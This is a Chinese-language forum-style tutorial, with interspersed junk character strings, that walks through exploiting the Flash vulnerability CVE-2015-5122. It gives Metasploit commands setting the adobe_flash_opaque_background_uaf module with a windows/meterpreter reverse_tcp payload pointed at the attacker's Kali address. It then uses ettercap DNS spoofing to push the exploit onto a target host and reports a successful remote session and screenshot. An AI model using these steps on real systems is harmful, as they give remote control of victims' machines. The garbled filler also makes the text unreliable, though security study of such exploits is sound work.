+ k0 `- S; k& `8 Z# X
二、cve2015-5122漏洞实例演示虚拟机
8 n5 H' E3 z1 O- f
# i! ? u" x- K. q# U6 j* K
: c& l. W5 T4 b) d, u9 b5 t 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 3 J( S1 n7 L2 h+ M1 y8 _: |7 n
4 Z/ L! L) ^. u" m' w0 R" G, u& M6 C1 [( E. C3 L5 V- t
search cve-2015-5122如图: ' d7 d$ e; a6 x
/ ]. I4 E" X/ e( ?0 a
" l8 ~7 u, j. k
7 J( F. `8 x" i ; p9 `. O* c" B4 o4 J! G/ c
6 v. q- i/ y! ?( S) j: X
下面我们敲如下命令:
: {" d( T1 T% m0 P) L" t
9 ?+ n7 w# b+ {. L. u( N! B4 N/ ~/ V+ {0 S* M) x- `- Z
use exploit/multi/browser/adobe_flash_opaque_background_uaf
8 F! A( ^5 X/ }
& O6 z8 h4 z2 P7 l7 M2 u5 w0 s% w2 O; z) T( n# G" L
set PAYLOAD windows/meterpreter/reverse_tcp $ N: q* D; }) c# e, j
; e N; x! `) J+ ~
( L: U* k, _( T% @# \0 l/ q- ~4 r set LHOST 192.168.0.109 / d6 }1 e: E- q0 G2 \6 `
5 r# y- i# V+ z5 [. h9 E' C& o0 [ ]( I& Z6 y: _
set URIPATH / /*根目录*/ ! y+ j' ?$ l" z' y* o* e8 V
F5 T" c9 M1 P7 \7 h2 _
' `& e9 Q$ H6 J* P set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
6 S0 H" p. s: c, f) m
$ C# |+ h9 T. N9 l8 W) s5 J! d
+ b: w1 c4 I; [+ b* {6 p set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ' j9 }* d K7 c
. Q3 l7 T: V2 `. L# R- K0 o. b2 R7 j( e5 j" v* k" K
然后show options如图:
& _/ M- L R6 x* l
9 k& p2 k) r- G: s. c9 m$ A" j7 I1 Z. }. S
/ [* f% r, M4 d E! T! i/ U1 D ; c- [# g& r& Q0 ^5 P' Z
' O# p; ` y0 }; t' `. V; o! v
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: $ ]/ ]# h _# S. T/ J+ u1 c
& s0 j3 i* Y& N% v5 }, X
: R- i. f+ ]% y G! @+ w
: `7 X n8 C4 n, x 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
6 w$ c: C- h$ L- ~6 ]4 b
2 }8 A/ J: `/ G! y% U' M
4 K% Q9 E" @; \' F# G* l- k Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
# E7 y+ f j* u9 N
4 C: R2 M7 Q6 v4 H8 M( J
" ]; ?# p$ S0 C0 h# p+ X" \, d
% Q/ `8 z1 z/ @. t* ~8 {7 d, ]2 p
% K: V. q1 {: A2 t |+ E) r* j& j4 B7 d3 K+ o
成功了,这时候我们断开ettercap,如图:
K, O9 [" t* n+ F
: v; `$ R2 u2 ~6 I
0 P+ q t* [- O7 D" h+ P- }
u- P- m l" t7 F) B3 z
$ n( ?/ ^& l4 D9 R( E1 H; E1 Z8 W/ l. z
Screenshot如图: 3 x( v$ i' d3 x& ^& I4 J: _
: |2 m, U. |+ M* R; v! V2 a* V8 X. R% q' J0 {+ ^/ A" h6 s! e& u. A
9 _ {8 P2 N7 u6 T + ~, ]; A( o& B, M- {8 Z
& f: e; h0 G# L* {4 o ) O2 D& J/ e3 K( v
|